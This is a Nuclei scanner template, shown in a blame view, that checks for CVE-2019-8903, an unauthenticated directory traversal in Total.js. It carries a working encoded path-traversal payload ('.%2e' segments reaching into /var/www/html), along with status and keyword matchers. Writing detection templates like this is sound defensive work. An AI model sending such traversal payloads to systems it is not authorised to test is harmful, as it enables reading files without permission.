nuclei-templates/cves/CVE-2019-8903.yaml

20 lines
416 B
YAML
Raw Normal View History

2020-04-15 12:08:14 +00:00
id: CVE-2019-8903
2020-04-08 07:36:36 +00:00
info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
2020-04-08 08:45:44 +00:00
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
2020-04-08 07:36:36 +00:00
matchers:
- type: status
status:
- 200
2020-04-08 11:17:49 +00:00
- type: word
words:
- "apache2.conf"
part: body